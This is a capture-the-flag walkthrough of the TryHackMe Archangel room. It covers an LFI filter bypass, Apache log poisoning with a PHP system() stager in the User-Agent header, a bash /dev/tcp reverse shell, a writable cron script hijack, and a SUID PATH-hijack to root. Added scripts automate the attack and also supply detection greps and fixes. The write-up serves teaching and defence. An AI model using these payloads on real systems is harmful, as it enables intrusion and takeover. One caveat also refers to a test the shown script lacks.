narancs's blog

TryHackMe – Archangel walkthrough

Introduction

TryHackMe Archangel room logo

Archangel is an easy-difficulty room on TryHackMe. It is a boot2root machine, but the tasks contain questions that point us in the right direction.

Task 2 questions

  • Find a different hostname
  • Find flag 1
  • Look for a page under development
  • Find flag 2
  • Get a shell and find the user flag

Task 3 questions

  • Get User 2 flag
  • Root the machine and find the root flag

Task 2 - Get a shell

Find a different hostname

Nmap scan result:

I checked the website; the answer to the first question is on the index page. The domain appears in the email address in the upper right corner.

Find flag 1

Next, I added the found domain to /etc/hosts with the IP address of the machine. Then I opened the site in my browser using the new domain and a different website was shown. That is because Apache hosts several sites on the same IP address using name-based virtual hosts: it picks the site from the Host header of the request, so the same IP returns a different page depending on the hostname. (You can verify this without touching /etc/hosts by sending the header explicitly, e.g. curl -H 'Host: <domain>' http://<ip>/.) More info: How to Host Multiple Websites With One Apache Server

This website displays the first flag:

Look for a page under development

Our next task is to find a page under development. We could use gobuster to enumerate pages on the website, but the page is listed in robots.txt as a disallowed path. robots.txt is a public file meant for crawlers, so listing a hidden path there advertises it to anyone who looks. That is the answer to the third question.

Page under development

Find flag 2

If we open the page we found, we see a button. After clicking it we are redirected to a different URL:

    http://***DOMAIN***.thm/***PAGE***?view=/var/www/html/development_testing/mrrobot.php

So the page under development accepts a URL parameter called view and displays the contents of the referenced file. This looks like a local file inclusion (LFI) vulnerability.

However, if we try to include other files, e.g. /etc/passwd, we get an error saying ‘Sorry, Thats not allowed’. To understand the logic that filters certain inputs, we can use a PHP wrapper to read the page's own source: php://filter/convert.base64-encode/ returns the file base64-encoded instead of executing it, so the PHP code comes back as text rather than being run. As the source will show, the filter only requires the development directory to appear somewhere in the string, which is why this wrapper URL is accepted. Info on PHP wrappers that can be used for LFI/RFI: https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers
I used the php://filter/convert.base64-encode/ wrapper:

    http://***DOMAIN***.thm/***PAGE***?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/***PAGE***

This returns the page as a long base64 string (not reproduced here). Decoding it (for example with base64 -d) gives the source code of the page under development. The source contains the answer to question 4 (‘Find flag 2’).

Get a shell and find the user flag

Checking for RCE
The source code also shows the logic that filters certain inputs and produces the ‘Thats not allowed’ message:
  • The view parameter must not contain the string ‘../..’
  • The view parameter must contain the string ‘/var/www/html/development_testing’
These conditions are meant to block traversal such as ‘/var/www/html/development_testing/../../../../../etc/passwd’, but the approach is flawed in two ways. The blacklist matches the literal substring ‘../..’, and a path resolver treats ‘.’ as a no-op, so ‘.././..’ climbs the same two directories without ever containing the banned substring. And the second check looks for the directory as a substring anywhere in the value rather than as a prefix, which is also why the php://filter URL above was accepted. So we just need to use ‘.././..’ instead of ‘../..’.
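To see exactly why ‘.././..’ slips through, here is an added example (my own script, not the room's test.php) that re-creates the two checks as the page describes them and then collapses the accepted strings the way a path resolver handles ‘.’ and ‘..’. The base directory and the test.php name are taken from the page; everything else is the example's own.

```shell
#!/bin/sh
# Added example: re-creates the two string checks the decoded source revealed
# and shows which payloads pass and where they really point.

BASE="/var/www/html/development_testing"

# Returns 0 if test.php would include the path, 1 if it answers "Thats not allowed".
view_allowed() {
    case "$1" in
        *"../.."*) return 1 ;;      # blacklist: the literal substring '../..'
    esac
    case "$1" in
        *"$BASE"*) return 0 ;;      # allowlist: BASE merely has to appear somewhere
    esac
    return 1
}

# Lexical normalisation of '.' and '..' components, so we can see where an
# accepted string really points. Prints the collapsed absolute path.
normalize_path() {
    out=""
    old_ifs=$IFS
    IFS=/
    for seg in $1; do
        case "$seg" in
            ""|".") ;;                  # empty (from '//') and '.' are no-ops
            "..")   out=${out%/*} ;;    # pop one directory, never above /
            *)      out="$out/$seg" ;;
        esac
    done
    IFS=$old_ifs
    printf '%s\n' "${out:-/}"
}

# Classic traversal: blocked by the blacklist.
NAIVE="$BASE/../../../../etc/passwd"
# Same directories, but '.' inserted between the '..' so '../..' never occurs.
BYPASS="$BASE/.././.././.././.././.././var/log/apache2/access.log"
# The page's wrapper URL: passes because BASE is a substring of the resource.
WRAPPER="php://filter/convert.base64-encode/resource=$BASE/test.php"

for p in "$NAIVE" "$BYPASS" "$WRAPPER" "/etc/passwd"; do
    if view_allowed "$p"; then
        printf 'ALLOWED  %s\n' "$p"
    else
        printf 'BLOCKED  %s\n' "$p"
    fi
done
printf 'bypass resolves to: %s\n' "$(normalize_path "$BYPASS")"
```

The normalisation here is purely lexical, which is enough to show where each accepted string ends up; on the target it is PHP that turns the string into an opened file, and the page's own log output confirms that both bypass variants it uses were accepted.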

To get a shell we can use the apache log file for RCE that is also described on the HackTricks website I linked earlier (Contents -> LFI2RCE -> Via Apache log file): https://book.hacktricks.xyz/pentesting-web/file-inclusion#via-apache-log-file

We need to be able to load the Apache log file via the LFI:

    http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log

It works. (This may not load, or may be very slow, if you ran gobuster or another enumeration tool against the site earlier, because the log will be huge. Restart the machine and try again; remember to update the IP in /etc/hosts.)

Exploiting the RCE vulnerability

The next step is to insert PHP code into the User-Agent header of a request to the website. I used Burp Suite to capture a request, sent it to Repeater and modified the User-Agent. This is the request:

    GET /test.php HTTP/1.1
    Host: mafialive.thm
    User-Agent: <?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    <empty line terminating the headers>

The header block has to be terminated by an empty line (a bare CRLF after the last header), as the HTTP specification requires; without it the server keeps waiting for more headers and the request never completes. Once the request has been sent we can check whether it worked: open the Apache log file via the file inclusion and add the extra query parameter that the PHP code in the User-Agent header reads:

    http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php..//..//..//..//..//..//var//log//apache2//access.log&cmd=ifconfig

&cmd=ifconfig is appended to the URL, so the value of the cmd parameter is ‘ifconfig’. The PHP code we placed in the User-Agent executes that command and its output appears in the page. (This URL uses a second variant of the bypass, ‘..//..’, which also never contains the literal ‘../..’.) Read the output in the page source or with curl: the browser collapses whitespace when rendering HTML, while the raw response preserves ifconfig's line breaks.

    10.11.56.129 - - [12/Jun/2022:20:30:38 +0530] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php..//..//..//..//..//..//var//log//apache2//access.log&cmd=ifconfig HTTP/1.1" 200 670 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
    10.11.56.129 - - [12/Jun/2022:20:31:13 +0530] "GET /test.php HTTP/1.1" 200 436 "-" "eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 9001
            inet 10.10.129.206  netmask 255.255.0.0  broadcast 10.10.255.255
            inet6 fe80::c3:77ff:fef2:8da9  prefixlen 64  scopeid 0x20<link>
            ether 02:c3:77:f2:8d:a9  txqueuelen 1000  (Ethernet)
            RX packets 114  bytes 14974 (14.9 KB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 160  bytes 19741 (19.7 KB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 104  bytes 8556 (8.5 KB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 104  bytes 8556 (8.5 KB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
     Gecko/20100101 Firefox/91.0"
    10.11.56.129 - - [12/Jun/2022:20:31:17 +0530] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php..//..//..//..//..//..//var//log//apache2//access.log&cmd=ifconfig HTTP/1.1" 200 1031 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

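The poison-then-include exchange above as a script, together with the grep a defender would run over access.log afterwards. This is an added example, not the author's Burp workflow: it assumes the host mafialive.thm and the test.php path seen above, the stager goes in via curl -A instead of Burp, and the three-line access.log sample at the bottom is constructed here (modelled on the lines above, with the command changed to id) so the detection functions can be exercised offline.

```shell
#!/bin/sh
# Added example: log poisoning via the User-Agent header, the include request
# that triggers it, and the defender's check over the same log.

TARGET="${TARGET:-http://mafialive.thm}"
LFI="/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log"
STAGER='<?php system($_GET["cmd"]); ?>'

# Percent-encode a query value (RFC 3986 unreserved characters pass through).
# Needed because '&', '>' and spaces in a reverse shell would otherwise be
# parsed as part of the query string or dropped.
urlencode() {
    s=$1; out=""
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}; s=${s#?}          # peel off the first character
        case "$c" in
            [A-Za-z0-9._~-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;
        esac
    done
    printf '%s\n' "$out"
}

# Full URL that includes the log and hands the command to the stager.
build_exec_url() {
    printf '%s/test.php?view=%s&cmd=%s\n' "$TARGET" "$(urlencode "$LFI")" "$(urlencode "$1")"
}

# Step 1: one request whose User-Agent is the stager. Apache writes the header
# verbatim into access.log. Do this once: a second, syntactically broken stager
# leaves a PHP parse error in the log and the include stops working until the
# log rotates.
poison_log() {
    curl -s -o /dev/null -A "$STAGER" "$TARGET/test.php"
}

# Step 2: include the poisoned log; PHP executes the stager with our cmd.
run_cmd() {
    curl -s "$(build_exec_url "$1")"
}

# Defender's side. Constructed sample log (not copied from the target): two
# ordinary requests and the poisoned one in between.
write_sample_log() {
    cat > "$1" <<'EOF'
10.11.56.129 - - [12/Jun/2022:20:30:38 +0530] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 670 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.11.56.129 - - [12/Jun/2022:20:31:13 +0530] "GET /test.php HTTP/1.1" 200 436 "-" "<?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/91.0"
10.11.56.129 - - [12/Jun/2022:20:31:17 +0530] "GET /test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log&cmd=id HTTP/1.1" 200 1031 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
EOF
}
# Lines whose User-Agent (last quoted field) carries a PHP open tag.
count_poisoned_ua() { grep -c -E '"[^"]*<\?(php|=)[^"]*"$' "$1"; }
# Requests whose view= parameter traverses, reaches into /var/log or uses a wrapper.
count_lfi_requests() { grep -c -E 'view=[^ "]*(\.\./|/var/log/|php://)' "$1"; }
```

poison_log once, then run_cmd id; for the reverse shell hand the whole bash -c '...' string to run_cmd and let urlencode deal with the & and > characters. The two count_ functions are the minimum a detection rule on the web server's access log should cover for this technique.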
We can now execute commands on the target, so we can put a reverse shell in the cmd parameter, start a listener and catch the shell. Two things to watch: PHP's system() runs the command through /bin/sh (dash on Ubuntu), which does not understand bash's /dev/tcp redirection, so wrap the one-liner as bash -c '...'; and the value must be URL-encoded, since the & and > characters would otherwise be interpreted as part of the query string. Reverse shell:

    bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1

Shell opened:

    narancs@kali:~$ nc -lvnp 4444
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::4444
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from 10.10.230.10.
    Ncat: Connection from 10.10.230.10:53652.
    /bin/sh: 0: can't access tty; job control turned off
    $

There is only one user with a home directory, and the user flag is in it.

Task 3 - Root the machine

Get User 2 flag

Looking at /etc/crontab, there is a script that is executed every minute as the archangel user.

    $ cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    # m h dom mon dow user  command
    */1 *   * * *   archangel /opt/helloworld.sh
    17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    $

The script is world-writable (ls -l /opt/helloworld.sh shows it), so we can append another reverse shell to it, start a second listener and get a shell as archangel within a minute. Once we are archangel we can enter the secret directory in /home/archangel, which contains the user 2 flag.
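The check behind ‘writable by anyone’, generalised to a whole system crontab: an added example, not from the room. It builds a scratch crontab with two scripts (one mode 777 like /opt/helloworld.sh, one mode 555) so it runs offline; on a target, call writable_cron_targets on /etc/crontab and on the files in /etc/cron.d.

```shell
#!/bin/sh
# Added example: list crontab entries whose executable the current user can
# modify. The fixture below is constructed; the crontab format is the system
# one from the page (m h dom mon dow user command).

# Prints "user path" for each entry whose command's executable is writable.
# Skips comments and VAR=value lines and only inspects the first word of the
# command; relative names (cd, test) are a PATH question, not a file-permission one.
writable_cron_targets() {
    while read -r m h dom mon dow user cmd; do
        case "$m" in ''|'#'*|*=*) continue ;; esac
        [ -n "$cmd" ] || continue
        exe=${cmd%% *}
        case "$exe" in /*) ;; *) continue ;; esac
        if [ -w "$exe" ]; then
            printf '%s %s\n' "$user" "$exe"
        fi
    done < "$1"
}

# Scratch setup: a world-writable script (the page's situation), a locked one,
# and a crontab that references both plus a run-parts line.
make_fixture() {
    dir=$1
    mkdir -p "$dir/opt"
    printf '#!/bin/bash\necho hello world\n' > "$dir/opt/helloworld.sh"
    printf '#!/bin/sh\n' > "$dir/opt/locked.sh"
    chmod 777 "$dir/opt/helloworld.sh"
    chmod 555 "$dir/opt/locked.sh"
    cat > "$dir/crontab" <<EOF
# m h dom mon dow user  command
SHELL=/bin/sh
*/1 *   * * *   archangel $dir/opt/helloworld.sh
*/5 *   * * *   root      $dir/opt/locked.sh --quiet
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
EOF
}

fixture=$(mktemp -d)
make_fixture "$fixture"
echo "writable cron targets in the fixture:"
writable_cron_targets "$fixture/crontab"
```

Run it as an unprivileged user: [ -w ] answers for the user running the check, which is exactly the question during privilege escalation (what can I, as www-data or archangel, change that someone else will execute). As root every file is writable, so the second assertion in the test is skipped there.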

Root the machine and find the root flag

There is another interesting file in the secret directory: an executable named ‘backup’ that has the SUID bit set and is owned by root. When I tried to execute it I received an error:

    archangel@ubuntu:~/secret$ ./backup 
    cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory
    archangel@ubuntu:~/secret$

If we use the strings command on the file we can find the exact command that gets executed:

    cp /home/user/archangel/myfiles/* /opt/backupfiles

The cp command is executed without an absolute path. We can omit paths for commands because of the PATH environment variable: an ordered list of directories that the shell searches, in order, for an executable whenever a command is given without a slash in its name.

This means we can create our own executable called cp in a directory we control and put that directory first in PATH. When the backup SUID binary runs its cp through the shell, it inherits our environment, so the shell finds our file first and our script runs with root privileges.

    archangel@ubuntu:~/secret$ echo -e '#!/bin/bash\n/bin/bash' > /tmp/cp
    archangel@ubuntu:~/secret$ chmod u+x /tmp/cp
    archangel@ubuntu:~/secret$ export PATH=/tmp:$PATH
    archangel@ubuntu:~/secret$ ./backup 
    root@ubuntu:~/secret# 

We are now root. We can get the root flag from /root/root.txt.
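The same hijack replayed in a scratch directory, as an added example that does not touch the target: the trojan cp only records that it was called, the SUID binary is stood in for by /bin/sh -c running the command string from the strings output (with a temp directory in place of /home/user/archangel and /opt), and a second run shows that an absolute /bin/cp defeats it.

```shell
#!/bin/sh
# Added example: PATH hijack of a relative 'cp', replayed without root or the
# SUID binary. The fake cp leaves a marker instead of spawning a shell.

WORK=$(mktemp -d)
HIJACK_DIR="$WORK/bin"
MARKER="$WORK/fake-cp-ran"
mkdir -p "$HIJACK_DIR" "$WORK/myfiles" "$WORK/backupfiles"

# The trojan: any executable named cp in a directory we control. On the box
# this is where the page puts /bin/bash.
cat > "$HIJACK_DIR/cp" <<EOF
#!/bin/sh
printf 'fake cp ran as uid %s with args: %s\n' "\$(id -u)" "\$*" > "$MARKER"
EOF
chmod u+x "$HIJACK_DIR/cp"

# What backup's system() amounts to: /bin/sh -c '<command>' with a bare 'cp',
# inheriting the caller's environment, PATH included.
BACKUP_CMD="cp $WORK/myfiles/* $WORK/backupfiles"
FIXED_CMD="/bin/cp $WORK/myfiles/* $WORK/backupfiles"   # the developer-side fix

# Run a command the way the SUID binary would, with our directory first in PATH.
# Returns 0 if the trojan executed, 1 if the real cp was used.
run_with_hijacked_path() {
    rm -f "$MARKER"
    PATH="$HIJACK_DIR:$PATH" /bin/sh -c "$1" 2>/dev/null || true
    [ -f "$MARKER" ]
}

attack_relative_cp() { run_with_hijacked_path "$BACKUP_CMD"; }
attack_absolute_cp() { run_with_hijacked_path "$FIXED_CMD"; }

if attack_relative_cp; then
    echo "hijacked: $(cat "$MARKER")"
fi
if attack_absolute_cp; then
    echo "unexpected: trojan ran despite the absolute path"
else
    echo "absolute /bin/cp is immune; it only fails with 'cannot stat', like the page's first run"
fi
```

Two practitioner caveats. If a SUID binary does not call setuid(0) itself, a trojan that just execs /bin/bash drops the effective UID back to the real one, so use bash -p in that case; the root prompt on the page shows it was not needed here. On the developer side the fix is the absolute path used in FIXED_CMD plus a sanitised environment for anything that runs with elevated privileges, since PATH is entirely under the caller's control.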
